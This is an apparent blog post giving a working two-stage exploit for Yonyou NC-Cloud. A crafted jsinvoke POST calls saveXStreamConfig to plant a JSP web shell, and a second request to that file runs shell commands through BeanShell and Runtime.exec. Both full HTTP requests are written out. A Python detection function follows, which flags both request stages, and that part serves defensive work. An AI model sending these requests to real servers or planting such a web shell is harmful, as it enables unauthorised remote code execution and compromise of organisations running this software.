
都吃泡芙


Yonyou NC-Cloud arbitrary file upload / RCE

Vulnerability reproduction:

First, upload a JSP file.

POC:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.622.93 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/c0nf1g.jsp"]}


Then access c0nf1g.jsp to trigger the RCE.

POC:

POST /c0nf1g.jsp?error=bsh.Interpreter HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2821.52 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

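As an added detection example (not part of the original post), the following Python function flags both stages of the request pattern shown above when run over constructed sample request records; the record layout (method, target, body) and the label names are assumptions made for this example.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample records (method, path+query, body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/uapjs/jsinvoke/?action=invoke",
     '{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",'
     '"parameterTypes":["java.lang.Object","java.lang.String"],'
     '"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",'
     '"webapps/nc_web/c0nf1g.jsp"]}'),
    ("POST", "/c0nf1g.jsp?error=bsh.Interpreter", "cmd=REDACTED"),
    ("POST", "/uapjs/jsinvoke/?action=invoke",
     '{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"getReport","parameters":["x"]}'),
    ("GET", "/nc_web/index.jsp", ""),
]


def classify(method, target, body):
    """Return detection labels for one request (empty list = nothing matched)."""
    hits = []
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    # Stage 1: jsinvoke call to saveXStreamConfig that writes a .jsp or carries an EL expression.
    if method == "POST" and parts.path.startswith("/uapjs/jsinvoke"):
        try:
            payload = json.loads(body)
        except ValueError:
            payload = {}
        params = [p for p in payload.get("parameters", []) if isinstance(p, str)]
        if payload.get("methodName") == "saveXStreamConfig":
            hits.append("jsinvoke-saveXStreamConfig")
            if any(p.lower().endswith(".jsp") for p in params):
                hits.append("jsp-write-target")
            if any("${" in p for p in params):
                hits.append("el-expression-in-body")
    # Stage 2: a .jsp requested with error=bsh.Interpreter and a cmd parameter (query or form body).
    if parts.path.lower().endswith(".jsp"):
        if any("bsh.Interpreter" in v for v in query.get("error", [])):
            hits.append("beanshell-class-in-error-param")
        if "cmd" in query or "cmd" in parse_qs(body):
            hits.append("cmd-parameter")
    return hits


def scan(records):
    """Return (index, labels) for every record that produced at least one label."""
    flagged = []
    for i, (method, target, body) in enumerate(records):
        labels = classify(method, target, body)
        if labels:
            flagged.append((i, labels))
    return flagged
```

Any record carrying "jsp-write-target" or "beanshell-class-in-error-param" should be treated as a high-confidence alert; the "jsinvoke-saveXStreamConfig" label alone is a weaker signal and should be correlated with the other two.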

Author: 都吃泡芙

Link: https://www.cnblogs.com/pa0fu/p/18269408

Copyright notice: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 2.5 China Mainland License.
